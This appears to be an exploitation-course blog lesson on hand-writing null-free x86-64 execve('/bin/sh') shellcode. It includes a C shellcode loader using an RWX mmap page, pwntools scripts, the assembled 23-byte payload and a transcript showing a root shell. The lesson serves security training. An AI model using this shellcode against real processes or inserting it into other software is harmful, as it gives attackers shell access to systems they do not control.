Post

Lesson 4.1: Writing execve Shellcode by Hand

Lesson 4.1: Writing execve Shellcode by Hand

So far, once we controlled RIP, we only knew how to jump into a function already present in the binary (ret2win). This lesson steps up: we bring our own code, plant it in the victim process’s memory, and force the CPU to run it. That code is called shellcode. The classic goal is calling execve("/bin/sh", NULL, NULL) to turn the process into a shell. We write x86-64 shellcode by hand so it contains no null byte, compare it with pwntools’ shellcraft version, measure its length, and test it for real by loading it into an RWX memory region and jumping in.

Building the execve shellcode: stack holds "/bin//sh", registers hold the syscall arguments The string “/bin//sh” is pushed onto the stack, rdi points at it, and rax/rsi/rdx are set before the syscall instruction.

Part: 4 · Reading + lab time: ~50 minutes · Difficulty: medium

Prerequisites: Lesson 1.1 (x86-64 assembly, registers), Lesson 1.2 (syscalls, calling convention), Lesson 2.1 (basic pwntools). Know that read/write/mmap are syscalls.

Tools: pwntools (asm, disasm, shellcraft), gcc, objdump. Test environment: Ubuntu 24.04.4, glibc 2.39, gcc 13.3.0.

Goals

By the end of this lesson you understand what shellcode is and why it has to be fully self-contained, not relying on libc or environment variables, you can write execve("/bin/sh", NULL, NULL) x86-64 shellcode by hand, null-free (no 0x00 byte), you can use pwntools.shellcraft to generate shellcode and asm() to assemble it, disasm() to read it back, you can measure shellcode length and explain every byte, and you can test shellcode on its own by loading it into RWX memory and jumping in, getting a real shell.

Theory

What shellcode is

Shellcode (originally: a piece of code used to open a shell) is a string of already-compiled machine code bytes, designed to be dropped straight into a victim process’s memory and executed by the CPU. It is not a runnable file (ELF) with a header, sections, or a loader. It is raw code, and because of that, shellcode has two characteristic constraints.

  • It has to handle everything itself: no libc to call system, no guaranteed environment variables, no guaranteed knowledge of what address it is sitting at. So shellcode calls kernel syscalls directly.
  • It usually has to be position-independent (run correctly no matter where it is placed), and usually has to avoid certain “bad” bytes, most commonly the null byte 0x00, since many string-copy vulnerabilities (strcpy/gets) stop as soon as they see 0x00.

The most common shellcode goal on Linux is calling the execve syscall.

1
execve("/bin/sh", NULL, NULL);

This replaces the currently running program entirely with /bin/sh. If the victim process is running as root, you get a root shell.

Syscalls on x86-64 and their calling convention

Review Lesson 1.2. On Linux x86-64, syscalls are invoked with the syscall instruction, with this convention.

  • rax = the syscall number. execve is 59 (0x3b).
  • Arguments go into rdi, rsi, rdx, r10, r8, r9, in that order.

So execve("/bin/sh", NULL, NULL) needs the following.

  • rax = 0x3b
  • rdi = a pointer to the string "/bin/sh\0"
  • rsi = 0 (empty argv)
  • rdx = 0 (empty envp)

The only tricky part is rdi, since we need a pointer to the string "/bin/sh" sitting somewhere in memory. Shellcode has no reliable address to put a string at in advance, so the classic trick is to push the string onto the stack yourself and point rdi at the top of the stack.

Why it has to be null-free, and the “/bin//sh” trick

"/bin/sh" is 7 characters, plus a null terminator, 8 bytes, exactly one 64-bit register. But if we embed the null byte \0 directly in a constant and mov it, the instruction’s own encoding would contain a 0x00 byte, breaking the null-free requirement. The trick is to use "/bin//sh" (one extra /, which the kernel treats the same as a single /), then use a register that is already zero as the null terminator.

Specifically, the string "/bin//sh" laid out little-endian becomes the constant 0x68732f2f6e69622f, with no 0x00 byte anywhere. We do the following.

  1. Set rsi = 0 with xor esi, esi. Note that xoring esi (32-bit) automatically zeroes the upper 32 bits of rsi too, and the instruction encoding 31 f6 has no null byte. Xoring the full 64-bit rsi would also work but adds a 0x48 prefix, still null-free but longer, so the 32-bit form is shorter.
  2. push rsi to push 8 zero bytes onto the stack: this becomes the string’s null terminator.
  3. mov rdi, 0x68732f2f6e69622f then push rdi: now the top of the stack is "/bin//sh", sitting right above the 8 zero bytes.
  4. push rsp; pop rdi: point rdi at the top of the stack, at the string "/bin//sh\0".
  5. xor edx, edx to set rdx = 0.
  6. push 0x3b; pop rax to set rax = 0x3b (push/pop instead of mov rax, 0x3b, since push/pop is shorter and avoids null bytes in a large constant’s encoding).
  7. syscall.

Why we need an RWX page to test it

The CPU can only execute memory pages (chunks of memory) that have execute permission. On modern systems NX (No-eXecute, also called DEP) is on by default: the stack and the heap are data regions with no execute permission, so jumping into shellcode placed there gets killed by the kernel immediately. This lesson does not deal with bypassing NX yet (that is for Lesson 4.2, when NX is off, and the ROP lessons later). Here we only need a clean environment to check whether the shellcode itself works correctly. The simplest way is to request an RWX page (read + write + execute) with mmap, copy the shellcode in, then cast the pointer to a function pointer and call it. This is a “shellcode runner,” and it is also this lesson’s lab.

Demo

The shellcode loader

The loader requests an RWX page, reads raw shellcode from stdin, copies it in, then jumps in.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// src.c (lab 4.1)
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void) {
    unsigned char buf[4096];
    ssize_t n = read(0, buf, sizeof(buf));           // read raw shellcode from stdin
    if (n <= 0) { perror("read"); return 1; }

    void *mem = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);   // an RWX page
    if (mem == MAP_FAILED) { perror("mmap"); return 1; }

    memcpy(mem, buf, n);
    fprintf(stderr, "[loader] %zd byte shellcode @ %p, jumping in...\n", n, mem);
    fflush(stderr);
    ((void (*)(void))mem)();                          // cast to a function pointer and call it
    return 0;
}

Compile it, with no special flags needed since we request RWX directly from mmap.

1
gcc -O0 -g -o loader src.c

Writing shellcode by hand and measuring it with pwntools

pwntools’ asm() assembles assembly into bytes, disasm() reads it back, and we check null-free with plain Python.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
context.arch = 'amd64'

sc_hand = asm('''
    xor    esi, esi                    /* rsi = 0 (argv) */
    push   rsi                         /* 8 zero bytes: the string's null terminator */
    mov    rdi, 0x68732f2f6e69622f     /* "/bin//sh" little-endian, no 0x00 byte */
    push   rdi
    push   rsp
    pop    rdi                         /* rdi -> "/bin//sh\\0" on the stack */
    xor    edx, edx                    /* rdx = 0 (envp) */
    push   0x3b
    pop    rax                         /* rax = 59 = SYS_execve */
    syscall
''')
print(len(sc_hand), b'\x00' not in sc_hand, sc_hand.hex())
print(disasm(sc_hand))

This is the real result.

1
2
3
4
5
6
7
8
9
10
11
23 True 31f65648bf2f62696e2f2f736857545f31d26a3b580f05
   0:   31 f6                   xor    esi, esi
   2:   56                      push   rsi
   3:   48 bf 2f 62 69 6e 2f 2f 73 68   movabs rdi, 0x68732f2f6e69622f
   d:   57                      push   rdi
   e:   54                      push   rsp
   f:   5f                      pop    rdi
  10:   31 d2                   xor    edx, edx
  12:   6a 3b                   push   0x3b
  14:   58                      pop    rax
  15:   0f 05                   syscall

23 bytes, null-free. Looking at the byte column, there is no 00 anywhere. In movabs rdi, 0x68732f2f6e69622f, the ten-byte encoding 48 bf 2f 62 69 6e 2f 2f 73 68 is exactly “/bin//sh” sitting in the constant.

Using pwntools’ shellcraft

pwntools ships shellcraft, which generates shellcode for many architectures, so get the amd64/linux shell shellcode.

1
2
3
4
5
from pwn import *
context.arch = 'amd64'
print(shellcraft.amd64.linux.sh())       # print the assembly
sc_craft = asm(shellcraft.amd64.linux.sh())
print(len(sc_craft))                      # 48

shellcraft.amd64.linux.sh() produces 48 bytes, longer than the 23-byte hand-written version. The reason: it also builds a proper argv = ["sh"] array on the stack (push the string “sh\0”, push a pointer to it, push a null) instead of passing argv = NULL. Both still open a shell, but the shellcraft version is more “by the book.” When you need very short shellcode (for example a tiny buffer), hand-written still wins. When you need something quick and reliable, shellcraft is more convenient.

Testing it for real: loading it into the loader and getting a shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/env python3
from pwn import *
context.arch = 'amd64'

sc = asm('''
    xor esi, esi
    push rsi
    mov rdi, 0x68732f2f6e69622f
    push rdi
    push rsp
    pop rdi
    xor edx, edx
    push 0x3b
    pop rax
    syscall
''')

io = process('./loader')
io.send(sc)                    # send raw shellcode over stdin
sleep(0.3)                     # wait for the loader to exec /bin/sh BEFORE typing commands
io.sendline(b'echo ===PWNED_4_1===; id; uname -r; echo ===END===')
io.sendline(b'exit')
print(io.recvall(timeout=5).decode(errors='replace'))

This runs for real on the server (Ubuntu 24.04.4, glibc 2.39).

1
2
3
4
5
[loader] 23 byte shellcode @ 0x755040ac9000, jumping in...
===PWNED_4_1===
uid=0(root) gid=0(root) groups=0(root)
6.8.0-134-generic
===END===

The uid=0(root) line proves the shellcode ran execve("/bin/sh") and we are in a real shell. Running it again, 8 out of 8 times, all produce a shell.

Note the sleep(0.3) line, because the loader reads stdin with a single large read. If you send the payload and the command right after each other, the command can get swallowed into the loader’s own buffer (because it reads greedily), leaving the resulting shell with no input to run. Waiting a moment for execve to finish before typing a command is the safe way. This is a harness trap you will run into again in Lesson 4.2.

Lab

LAB 4.1Download the lab files

All the code lives in the Lab section below (src.c, build.sh, exploit.py, transcript.txt, README.md).

  • Task 1 (required): type out execve("/bin/sh") null-free shellcode yourself, load it into the loader, get a shell, with the goal of seeing the uid=... line from id.
  • Task 2 (advanced): write a different null-free shellcode with a different goal, for example reading a flag file and printing it to the screen using three syscalls, open (2), read (0), write (1). Put the filename flag.txt on the stack, open it, read into a stack buffer, write to fd 1. Measure the length, check it is null-free.

Hints, in tiers.

  • Hint 1: always set context.arch = 'amd64' before asm(), otherwise pwntools assembles for the wrong architecture.
  • Hint 2: check null-free with b'\x00' not in sc. If you find a null byte, look for a mov reg, small-constant (prefer push imm; pop reg) or a 64-bit xor (use the 32-bit form instead, it’s shorter).
  • Hint 3: for task 2, the filename “flag.txt” is 8 characters, exactly one register, but remember the null terminator (push a zero register first). Syscall numbers: open=2, read=0, write=1. open("flag.txt", O_RDONLY=0).
  • Hint 4: run disasm(sc) to check the instructions actually say what you meant.

As a check, consider how many bytes your shellcode is, whether it contains a null byte, and why the “/bin//sh” trick avoids one.

Key takeaways

  • Shellcode is raw machine code that calls syscalls directly, without relying on libc.
  • execve("/bin/sh"): rax=0x3b, rdi points at “/bin/sh”, rsi=0, rdx=0, then syscall.
  • Null-free: use “/bin//sh”, xor a 32-bit register to make a zero, push/pop instead of mov for small constants.
  • asm() assembles, disasm() reads back, shellcraft generates ready-made shellcode, b'\x00' not in sc checks for null bytes.
  • Test shellcode on its own with an RWX page (mmap), then cast the pointer to a function and call it.
  • Measured lengths: the hand-written version is 23 bytes, shellcraft.amd64.linux.sh() is 48 bytes.

Common pitfalls

  • Forgetting context.arch = 'amd64': asm() assembles for the machine’s default architecture or i386, producing entirely wrong bytes.
  • Shellcode ending up with a null byte without noticing: using mov rax, 0x3b (which generates several zero bytes in the 64-bit constant), or mov rsi, 0. Replace with push 0x3b; pop rax and xor esi, esi.
  • Jumping into shellcode on the stack/heap while forgetting NX is on: the process dies immediately with SIGSEGV. This lesson avoids that with an mmap RWX page. On a real binary with NX you cannot load shellcode this way, you need a different approach (Lesson 4.2 when NX is off, or ROP in Part 6).
  • Sending a command too soon after the payload: the command gets swallowed by the loader’s one large read, leaving the shell with no input. Add a small sleep, or send the command only once you are sure the shell is ready.
  • Mixing up syscall numbers: execve is 59 on x86-64, but it is 11 and uses int 0x80 on x86 (32-bit). Don’t confuse the 32-bit and 64-bit syscall tables.

Further reading

  • The shellcraft section of the pwntools documentation: the shellcode catalog by architecture and OS.
  • The Linux x86-64 syscall table (for example Ryan Chapman’s page, or ausyscall --dump).
  • “Smashing The Stack For Fun And Profit” (Aleph One): the classic hand-rolled shellcode section (old x86, but the idea still holds).
  • shell-storm.org/shellcode: a repository of sample shellcode for many architectures.
This post is licensed under CC BY 4.0 by the author.